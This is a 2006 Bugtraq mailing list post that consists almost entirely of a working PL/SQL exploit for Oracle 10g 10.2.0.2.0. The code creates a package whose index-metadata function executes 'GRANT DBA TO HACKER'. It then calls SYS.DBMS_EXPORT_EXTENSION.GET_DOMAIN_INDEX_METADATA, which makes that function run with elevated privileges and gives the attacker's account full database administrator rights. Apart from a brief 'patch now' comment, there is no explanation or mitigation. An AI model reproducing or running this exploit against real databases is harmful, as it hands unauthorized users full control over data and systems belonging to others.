Bugtraq mailing list archives
Oracle 10g 10.2.0.2.0 DBA exploit
From: "putosoft softputo" <hasecorp () hotmail com>
Date: Wed, 19 Apr 2006 08:33:56 +0000
/* * Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0 * * Patch your database now! * * by N1V1Hd $3c41r3 * */ CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER ISFUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER; END; / CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE ISFUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER IS pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO HACKER'; COMMIT; RETURN(1); END; END; / DECLARE INDEX_NAME VARCHAR2(200); INDEX_SCHEMA VARCHAR2(200); TYPE_NAME VARCHAR2(200); TYPE_SCHEMA VARCHAR2(200); VERSION VARCHAR2(200); NEWBLOCK PLS_INTEGER; GMFLAGS NUMBER; v_Return VARCHAR2(200); BEGIN INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER'; TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER'; VERSION := '10.2.0.2.0'; GMFLAGS := 1; v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => NEWBLOCK, GMFLAGS => GMFLAGS
); END; / _________________________________________________________________Acepta el reto MSN Premium: Correos más divertidos con fotos y textos increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos
Current thread:
- Oracle 10g 10.2.0.2.0 DBA exploit putosoft softputo (Apr 19)